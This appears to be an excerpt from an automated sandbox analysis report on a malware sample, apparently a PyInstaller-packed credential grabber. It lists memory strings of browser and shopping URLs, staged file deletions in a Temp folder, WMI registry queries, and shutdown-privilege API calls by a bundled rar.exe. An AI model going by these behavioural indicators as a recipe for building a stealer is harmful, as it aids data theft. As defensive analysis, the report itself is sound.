              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C29E9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
              Source: X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2E41000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693315105.000001E7C2586000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
              Source: X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C346C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ifeng.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.iqiyi.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.leboncoin.fr/
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A00000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709657998.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A16000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481621121.000001E7C3A16000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1464140518.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481621121.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1688159518.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C29E9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A10000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38A8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
              Source: X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1592523972.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1690170405.000001E7C3A89000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38B4000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709775944.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
              Source: X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1711482875.00007FFB0BA99000.00000004.00000001.01000000.00000011.sdmp, X9g8L63QGs.exe, 00000007.00000002.1712549719.00007FFB0BFAA000.00000004.00000001.01000000.00000010.sdmp, libcrypto-3.dll.4.dr | String found in binary or memory: https://www.openssl.org/H
              Source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C724000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: https://www.python.org/psf/license/
              Source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: https://www.python.org/psf/license/)
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1592523972.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1690170405.000001E7C3A89000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38B4000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709775944.000001E7C3A8A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
              Source: unknown | Network traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49913
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | File deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\PWZOQIFCAN.jpg
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | File deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\WHZAGPPPLA.mp3
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | File deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\HQJBRDYKDE.mp3
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | File deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\NIRMEKAMZH.png
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | File deleted: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\VWDFPKGDUF.jpg
              Source: cmd.exe | Process created: 67
              Note on the deletions: all five paths sit under the sample's own working directory in %LOCALAPPDATA%\Temp (the "? ?" component is a directory name that did not survive report extraction), not in the user's real Desktop or Documents folders. The ransomware-style reading this category suggests is therefore weakly supported: the deletions are consistent with the grabber removing copies it staged for archiving, not with destruction of the originals. Confirm the originals are intact before treating this as data destruction.

              System Summary

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue (12 identical entries)
              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue (12 identical entries)
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080B3A70: CreateFileW, CreateFileW, DeviceIoControl, CloseHandle (a _MEI<digits> directory under %TEMP% is where a PyInstaller one-file executable unpacks its bundled payload, which here includes rar.exe)
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080DB57C: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitWindowsEx (OpenProcessToken, LookupPrivilegeValueW and AdjustTokenPrivileges ahead of ExitWindowsEx is the documented way to enable SeShutdownPrivilege, which ExitWindowsEx requires for a reboot or shutdown)
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2668BD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C26869D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2661000
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C266A34B
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2671BC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2686488
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2683C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2672C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2685C70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C266A4E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2678154
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C268411C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2673A14
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C26721D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C26719B4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C267DACC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C267DF60
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2678804
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2671FD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C26717B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2689798
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2669870
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C266AD1D
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2673610
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C267E5E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2671DC4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2675DA0
